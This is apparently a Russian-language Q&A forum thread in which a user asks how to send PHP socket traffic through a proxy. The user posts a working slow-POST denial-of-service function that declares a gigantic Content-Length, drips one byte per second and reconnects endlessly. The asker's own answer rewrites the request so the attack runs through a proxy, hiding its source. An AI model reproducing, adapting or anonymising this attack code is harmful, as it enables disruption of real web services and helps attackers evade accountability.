woonem
@woonem

Как в php все совершенно интернет-подключения проводить через прокси без установки программ?

Как в php интернет-подключение проводить через прокси без установки программ (например, cURL надо устанавливать - не подходит)?

Как вот этот код переделать под прокси?
function attack_post($server, $host){
$request = "POST /".md5(rand())." HTTP/1.1\r\n";
$request .= "Host: $host\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Content-Length: 1000000000\r\n";
$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Accept: *.*\r\n";

$sockfd = @fsockopen($server, 80, $errno, $errstr);
@fwrite($sockfd, $request);

while (true){
if (@fwrite($sockfd, ".") !== FALSE){
echo ".";
sleep(1);
}else{
echo "\nOne post attack failed to sent...\n";
$sockfd = @fsockopen($server, 80, $errno, $errstr);
@fwrite($sockfd, $request);
}
}
}
  • Вопрос задан
  • 776 просмотров
Решения вопроса 2
можно пользоваться обычными функциями fopen, file_get_contents и прочими... при этом заворачивать их через прокси сервер... у каждой из функций есть опциональный параметр $context, смотрите документацию по созданию контекста: stream_context_create
Ответ написан
woonem
@woonem Автор вопроса
надо поменять строчки
$request = "POST /".md5(rand())." HTTP/1.1\r\n";
$request .= "Host: ".$host."\r\n";

на
$request = "POST http://".$host."/".md5(rand())." HTTP/1.1\r\n";
$request .= "Host: ".$proxy."\r\n";

где $proxy - это адрес прокси
Ответ написан
Комментировать
Пригласить эксперта
Ответы на вопрос 1
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы